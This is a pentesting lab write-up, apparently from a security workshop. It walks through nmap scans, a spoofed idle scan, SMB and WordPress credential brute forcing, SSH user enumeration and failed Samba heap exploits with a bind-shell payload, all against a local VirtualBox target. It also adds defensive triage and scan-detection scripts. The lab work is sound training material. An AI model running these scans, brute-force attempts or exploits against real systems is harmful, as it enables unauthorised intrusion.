Pentesting: Metasploit tests

Notes: a review of what I learned in the '#Pentesting4ever' workshop given at the #Euskalhack computer security conference.



1) I start the machine to be audited, illidan, in VirtualBox

Note: I set its network adapter to host-only.

My VMs' network is 192.168.56.XX (this may differ on your machine; check with ip a | grep global).
Then I run nmap -sn 192.168.56.0/24 or nmap -sn 192.168.56.* to see what shows up:

em50l@jejo.es:~$ nmap -sn 192.168.56.*

Starting Nmap 7.60 ( https://nmap.org ) at 2019-06-30 12:35 CEST
Nmap scan report for medion (192.168.56.1)
Host is up (0.00040s latency).
Nmap scan report for 192.168.56.103
Host is up (0.00056s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.32 seconds

em50l@jejo.es$ 

Good. The IP is 192.168.56.103


Although it is not necessary (it is not good to make a lot of noise), I take a look at the ports:
nmap 192.168.56.103 -p 1-1024

Starting Nmap 7.60 ( https://nmap.org ) at 2019-06-23 12:48 CEST
Nmap scan report for 192.168.56.103
Host is up (0.00051s latency).
Not shown: 1015 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
993/tcp open  imaps
995/tcp open  pop3s
Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds

As a note on this first scan, I see FTP, HTTP, mail and Microsoft SMB.



Tests with Metasploit

The best way is to start the Metasploit console, msfconsole

root@kali:~# msfconsole 
                                   .,,.                  .
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________   ,&$$$$$$'_____
                                                                 ll&&$$$$'
                                                              .;;lll&&&&'
                                                            ...;;lllll&'
                                                          ......;;;llll;;;....
                                                           ` ......;;;;... .  .
       =[ metasploit v5.0.20-dev                          ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > 

It is a REPL-style interface; you can use Tab to list the available commands.

I type use aux <tab> sca <tab> ht <tab> w <tab> to list all the WordPress modules.

msf5 > use auxiliary/scanner/http/wordpress_xmlrpc_login 
msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) >

I type sh <tab> act <tab>

msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > show actions 

Auxiliary actions:
   Name  Description

msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > 

I type show options

msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > show options
Module options (auxiliary/scanner/http/wordpress_xmlrpc_login):
   Name              Current Setting  Required  Description
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             80               yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   TARGETURI         /                yes       The base path to the wordpress application
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
   VHOST                              no        HTTP server virtual host
msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > 


I configure the module

msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set targeturi /
targeturi => /
msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set rhosts 192.168.56.103
rhosts => 192.168.56.103
msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > run

[*] 192.168.56.103:80    :/xmlrpc.php - Sending Hello...
[+] 192.168.56.103:80 - XMLRPC enabled, Hello message received!
[*] Starting XML-RPC login sweep...
[*] Error: 192.168.56.103: Metasploit::Framework::LoginScanner::Invalid Cred details can't be blank, Cred details can't be blank (Metasploit::Framework::LoginScanner::WordpressRPC)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > 

It looks like I am finally getting something. (The Error line only means the module was run with no credentials set: no USERNAME/PASSWORD, USER_FILE or PASS_FILE, so the login sweep itself never started.)

Tip: you can also run nmap from inside Metasploit

(but in my experience it runs slower)

msf5 > nmap 192.168.56.103 -p 1-1024
[*] exec: nmap 192.168.56.103 -p 1-1024

Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-06 09:13 EDT
Nmap scan report for 192.168.56.103 (192.168.56.103)
Host is up (0.0011s latency).
Not shown: 1015 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
993/tcp open  imaps
995/tcp open  pop3s

Nmap done: 1 IP address (1 host up) scanned in 0.80 seconds
msf5 > 


Detailed scan: nmap -Pn -sS -A 192.168.56.103

msf5 > nmap -Pn -sS -A 192.168.56.103
[*] exec: nmap -Pn -sS -A 192.168.56.103

Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-06 09:14 EDT
Nmap scan report for 192.168.56.103 (192.168.56.103)
Host is up (0.0017s latency).
Not shown: 991 closed ports
PORT    STATE SERVICE     VERSION

21/tcp  open  ftp         vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|
| FTP server status:      vsFTPd 2.3.5 - secure, fast, stable

22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)

80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
|_http-generator: WordPress 4.6.6
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Everybody want to be a chef | Just another WordPress site

110/tcp open  pop3        Dovecot pop3d

139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

143/tcp open  imap        Dovecot imapd

445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)

993/tcp open  ssl/imaps?

995/tcp open  ssl/pop3s?

Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: ILLIDAN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.6.3)
|   Computer name: illidan
|   FQDN: illidan
|_  System time: 2019-07-06T15:15:12+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Nmap done: 1 IP address (1 host up) scanned in 160.83 seconds
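
As an added triage example (not part of the original notes): a small parser over the nmap -A report above that lists the open services, flags the script results a defender should act on first (anonymous FTP, SMB signing disabled, exposed WordPress version) and compares each banner against a version baseline. The sample report and the MIN_VERSION baseline are constructed for the example; the baseline values are assumptions, not a published policy.

```python
import re
# Constructed sample input: a trimmed copy of the nmap -A report shown above.
NMAP_REPORT = """\
21/tcp  open  ftp         vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
|_http-generator: WordPress 4.6.6
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
"""

# Constructed baseline (an assumption, not a published policy): the oldest
# acceptable version per product. Adjust it to your own patch policy.
MIN_VERSION = {"vsftpd": (3, 0), "OpenSSH": (7, 0), "Apache httpd": (2, 4), "Samba": (4, 0)}

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s+(.*)$")
VERSION_RE = re.compile(r"^(vsftpd|OpenSSH|Apache httpd|Samba)(?: smbd)? (\d+(?:\.\d+)+)")

def parse_services(report):
    """Return [(port, nmap service name, version banner)] for each open port line."""
    out = []
    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m:
            out.append((int(m.group(1)), m.group(3), m.group(4).strip()))
    return out

def outdated(services, baseline=MIN_VERSION):
    """Return {port: product} for every banner older than the baseline version."""
    old = {}
    for port, _svc, banner in services:
        m = VERSION_RE.match(banner)
        if not m:
            continue  # no recognised product/version in the banner
        product = m.group(1)
        version = tuple(int(x) for x in m.group(2).split("."))
        if product in baseline and version < baseline[product]:
            old[port] = product
    return old

def triage(report):
    """Flag the script results a defender would act on first."""
    findings = {}
    if "Anonymous FTP login allowed" in report:
        findings["ftp-anon"] = "set anonymous_enable=NO in vsftpd.conf"
    if "message_signing: disabled" in report:
        findings["smb-signing"] = "require signing: server signing = mandatory in smb.conf"
    m = re.search(r"http-generator: WordPress (\d+(?:\.\d+)+)", report)
    if m:
        findings["wordpress"] = "version " + m.group(1) + " exposed: update and remove the generator tag"
    for port, product in outdated(parse_services(report)).items():
        findings["port%d" % port] = product + " is below the version baseline: upgrade"
    return findings
```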

TCP idle scan: scanning stealthily by spoofing the source IP address.

msf5 > use auxiliary/scanner/ip/ipidseq
msf5 auxiliary(scanner/ip/ipidseq) > set rhosts 192.168.56.64/26
rhosts => 192.168.56.64/26
msf5 auxiliary(scanner/ip/ipidseq) > run

[*] 192.168.56.101's IPID sequence class: Incremental!
[*] 192.168.56.103's IPID sequence class: Incremental!
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ip/ipidseq) > 

msf5 auxiliary(scanner/ip/ipidseq) > nmap -PN -sI 192.168.56.101 192.168.56.103
6/tcp     open            unknown
......
20/tcp    open            ftp-data
21/tcp    closed|filtered ftp
22/tcp    closed|filtered ssh
23/tcp    open            telnet
.....
79/tcp    open            finger
80/tcp    closed|filtered http
.....
109/tcp   open            pop2
110/tcp   closed|filtered pop3
111/tcp   open            rpcbind
113/tcp   open            ident
119/tcp   open            nntp
125/tcp   open            locus-map
135/tcp   open            msrpc
139/tcp   closed|filtered netbios-ssn
143/tcp   closed|filtered imap
144/tcp   open            news
.....
444/tcp   open            snpp
445/tcp   closed|filtered microsoft-ds
458/tcp   open            appleqtc
......
992/tcp   open            telnets
993/tcp   closed|filtered imaps
995/tcp   closed|filtered pop3s
999/tcp   open            garcon
.....

The advantage of this scan is that the source IP is not detected: if I run tcpdump I do not see the IP of the scanning machine. (A caveat: the port list above is the inverse of the direct scan, with 21, 22, 80, 110, 139, 143 and 445 reported closed|filtered and ports that were closed reported open, so this particular idle-scan result cannot be trusted; an idle scan is only reliable when the zombie is truly idle and its IPID counter is predictable.)

root@illidan:~# tcpdump -n
16:39:21 IP 192.168.56.1.45596 > 192.168.56.103.23:   Flags [S], seq 91, win 29200, opt [mss 1460,sackOK,TS val 1432 ecr 0,nop,wscale7],l0
16:39:21 IP 192.168.56.103.23   > 192.168.56.1.45596: Flags [R.], seq 0, ack 92, win 0, length 0
16:39:22 IP 192.168.56.1.45598 > 192.168.56.103.23:   Flags [S], seq 60, win 29200, opt [mss 1460,sackOK,TS val 1446 ecr 0,nop,wscale7],l0
16:39:22 IP 192.168.56.103.23   > 192.168.56.1.45598: Flags [R.], seq 0, ack 61, win 0, length 0
16:39:22 IP 192.168.56.1.45600 > 192.168.56.103.23:   Flags [S], seq 51, win 29200, opt [mss 1460,sackOK,TS val 1472 ecr 0,nop,wscale7],l0
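
An added detection example, not part of the original notes: it parses tcpdump -n lines in the format shown above (the sample is constructed from that capture, with two extra lines for an open port answered with SYN/ACK) and counts, per source address, how many SYNs drew a RST. On an idle scan the address it flags is the spoofed one, which is exactly the blind spot the note describes.

```python
import re
from collections import defaultdict

# Constructed sample in tcpdump -n format, based on the capture above.
CAPTURE = """\
16:39:21 IP 192.168.56.1.45596 > 192.168.56.103.23: Flags [S], seq 91, win 29200, length 0
16:39:21 IP 192.168.56.103.23 > 192.168.56.1.45596: Flags [R.], seq 0, ack 92, win 0, length 0
16:39:22 IP 192.168.56.1.45598 > 192.168.56.103.23: Flags [S], seq 60, win 29200, length 0
16:39:22 IP 192.168.56.103.23 > 192.168.56.1.45598: Flags [R.], seq 0, ack 61, win 0, length 0
16:39:22 IP 192.168.56.1.45600 > 192.168.56.103.23: Flags [S], seq 51, win 29200, length 0
16:39:22 IP 192.168.56.1.45602 > 192.168.56.103.80: Flags [S], seq 12, win 29200, length 0
16:39:22 IP 192.168.56.103.80 > 192.168.56.1.45602: Flags [S.], seq 7, ack 13, win 28960, length 0
"""

LINE_RE = re.compile(
    r"^\S+ IP (\d+\.\d+\.\d+\.\d+)\.(\d+)\s+>\s+(\d+\.\d+\.\d+\.\d+)\.(\d+):\s+Flags \[([^\]]+)\]")

def parse_packets(capture):
    """Return (src, sport, dst, dport, flags) for each line tcpdump printed."""
    pkts = []
    for line in capture.splitlines():
        m = LINE_RE.match(line)
        if m:
            pkts.append((m.group(1), int(m.group(2)), m.group(3), int(m.group(4)), m.group(5)))
    return pkts

def syn_summary(pkts):
    """Per source address: SYNs sent, and how many were answered with RST
    (closed port) or SYN/ACK (open port). Replies are credited to the address
    they are sent back to, i.e. whatever source address the probe carried."""
    summary = defaultdict(lambda: {"syn": 0, "rst": 0, "synack": 0})
    for src, _sport, dst, _dport, flags in pkts:
        if flags == "S":
            summary[src]["syn"] += 1
        elif flags == "R.":
            summary[dst]["rst"] += 1
        elif flags == "S.":
            summary[dst]["synack"] += 1
    return dict(summary)

def suspected_scanners(pkts, min_syn=3):
    """Sources with several SYNs of which at least half drew a RST. In an idle
    scan this is the spoofed (zombie) address, never the real scanner, so the
    alert has to be correlated with the zombie's own traffic."""
    return sorted(src for src, c in syn_summary(pkts).items()
                  if c["syn"] >= min_syn and 2 * c["rst"] >= c["syn"])
```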

Port Scanning with Metasploit

use scanner/portscan/syn
set RHOSTS 192.168.56.103
run

msf5 > use scanner/portscan/syn
msf5 auxiliary(scanner/portscan/syn) > set RHOSTS 192.168.56.103
RHOSTS => 192.168.56.103
msf5 auxiliary(scanner/portscan/syn) > run

[+]  TCP OPEN 192.168.56.103:21
[+]  TCP OPEN 192.168.56.103:22
[+]  TCP OPEN 192.168.56.103:80
[+]  TCP OPEN 192.168.56.103:110
[+]  TCP OPEN 192.168.56.103:139
[+]  TCP OPEN 192.168.56.103:143
For my taste a bit slow.

#### Targeted Scanning with Metasploit

use scanner/smb/smb_version
set RHOSTS 192.168.56.103
run

#### SSH Server Scanning

use scanner/ssh/ssh_version
set RHOSTS 192.168.56.103
run

msf5 > 
msf5 > use scanner/ssh/ssh_version
msf5 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.56.103
RHOSTS => 192.168.56.103
msf5 auxiliary(scanner/ssh/ssh_version) > run

[+] 192.168.56.103:22     - SSH server version: SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4 ( service.version=5.9p1 openssh.comment=Debian-5ubuntu1.4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:5.9p1 os.vendor=Ubuntu os.family=Linux os.product=Linux os.version=12.04 os.cpe23=cpe:/o:canonical:ubuntu_linux:12.04 service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.56.103:22     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_version) > 

Validating SMB Logins

use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.56.1/24
set SMBUser Administrator
set SMBPass s3cr3t
run
This would try to log in on every computer on the network.

msf5 > 
msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 192.168.56.64/26
RHOSTS => 192.168.56.64/26
msf5 auxiliary(scanner/smb/smb_login) > set SMBUser Administrator
SMBUser => Administrator
msf5 auxiliary(scanner/smb/smb_login) > set SMBPass eUSk4l_99%
SMBPass => eUSk4l_99%
msf5 auxiliary(scanner/smb/smb_login) > run

[*] 192.168.56.102:445    - 192.168.56.102:445 - Starting SMB login bruteforce
[-] 192.168.56.102:445    - 192.168.56.102:445 - Could not connect
[!] 192.168.56.102:445    - No active DB -- Credential data will not be saved!
[*] 192.168.56.103:445    - 192.168.56.103:445 - Starting SMB login bruteforce
[+] 192.168.56.103:445    - 192.168.56.103:445 - Success: '.\Administrator:eUSk4l_99%'
As can be seen, it authenticated on .103 (another vulnerability found).

#### Searching for VNC without authentication

use auxiliary/scanner/vnc/vnc_none_auth
set RHOSTS 192.168.56.1/24
run

This would look for VNC without a password on every computer on the network.

___

## Exploiting an Ubuntu machine

nmap -sT -A -P0 192.168.56.103

#### Trying SMB

msf5 > use linux/samba/lsa_transnames_heap
msf5 exploit(linux/samba/lsa_transnames_heap) > set payload linux/x86/shell_bind_tcp
payload => linux/x86/shell_bind_tcp
msf5 exploit(linux/samba/lsa_transnames_heap) > set LPORT 8080
LPORT => 8080
msf5 exploit(linux/samba/lsa_transnames_heap) > set RHOSTS 192.168.56.103
RHOSTS => 192.168.56.103
msf5 exploit(linux/samba/lsa_transnames_heap) > exploit

[*] 192.168.56.103:445 - Creating nop sled....
[*] Started bind TCP handler against 192.168.56.103:8080
[*] 192.168.56.103:445 - Trying to exploit Samba with address 0xffffe410...
[*] 192.168.56.103:445 - Connecting to the SMB service...
[-] 192.168.56.103:445 - Exploit aborted due to failure: no-target: This target is not a vulnerable Samba server (Samba 3.6.3)
[*] Exploit completed, but no session was created.
msf5 exploit(linux/samba/lsa_transnames_heap) > 
Oh, what a pity ;-( I search a bit more: `Samba 3.6.3 vuln exploitmeta` https://www.cvedetails.com/version/124670/Samba-Samba-3.6.3.html, then go to Related Metasploit Modules https://www.cvedetails.com/metasploit-modules/version-124670/Samba-Samba-3.6.3.html; there are 3 modules. I try them...
msf5 > 
msf5 > use exploit/linux/samba/setinfopolicy_heap
msf5 exploit(linux/samba/setinfopolicy_heap) > set payload linux/x86/shell_bind_tcp
payload => linux/x86/shell_bind_tcp
msf5 exploit(linux/samba/setinfopolicy_heap) > set RHOSTS 192.168.56.103
RHOSTS => 192.168.56.103
msf5 exploit(linux/samba/setinfopolicy_heap) > exploit

[*] 192.168.56.103:445 - Trying to exploit Samba with address 0xb67f1000...
[*] Started bind TCP handler against 192.168.56.103:8080
[-] 192.168.56.103:445 - Server is most likely patched...
Oh, what a pity ;-(

#### Trying SSH

The machine has OpenSSH, so I search for modules: search OpenSSH

msf5 > search OpenSSH

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   1  auxiliary/scanner/ssh/ssh_enumusers                          normal     Yes    SSH Username Enumeration
   2  exploit/windows/local/trusted_service_path  2001-10-25       excellent  Yes    Windows Service Trusted Path Privilege Escalation
   3  post/multi/gather/ssh_creds                                  normal     No     Multi Gather OpenSSH PKI Credentials Collection
   4  post/windows/manage/forward_pageant                          normal     No     Forward SSH Agent Requests To Remote Pageant


msf5 > 
msf5 > 
msf5 > use auxiliary/scanner/ssh/ssh_enumusers
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 192.168.56.103
RHOSTS => 192.168.56.103
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set username root
username => root
msf5 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 192.168.56.103:22 - SSH - Using malformed packet technique
[*] 192.168.56.103:22 - SSH - Starting scan
[+] 192.168.56.103:22 - SSH - User 'root' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_enumusers) > 

Nothing...

I try HTTP

https://www.cvedetails.com/version/142323/Apache-Http-Server-2.2.22.html
Nothing...

I try WordPress

msf5 > use auxiliary/scanner/http/wordpress_login_enum
msf5 auxiliary(scanner/http/wordpress_login_enum) > run

[*] / - WordPress Version 4.6.6 detected
[*] 192.168.56.103:80 - / - WordPress User-Enumeration - Running User Enumeration
[*] 192.168.56.103:80 - / - WordPress User-Validation - Running User Validation
[*] / - WordPress User-Validation - Checking Username:'sean'
[+] / - WordPress User-Validation - Username: 'sean' - is VALID
[+] / - WordPress User-Validation - Found 1 valid user
[*] 192.168.56.103:80 - [2/1] - / - WordPress Brute Force - Running Bruteforce
[*] 192.168.56.103:80 - [2/1] - / - WordPress Brute Force - Skipping all but 1 valid user
[*] 192.168.56.103:80 - [1/1] - / - WordPress Brute Force - Trying username:'sean' with password:'eUSk4l_99%'
[-] 192.168.56.103:80 - [1/1] - / - WordPress Brute Force - Failed to login as 'sean'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/wordpress_login_enum) >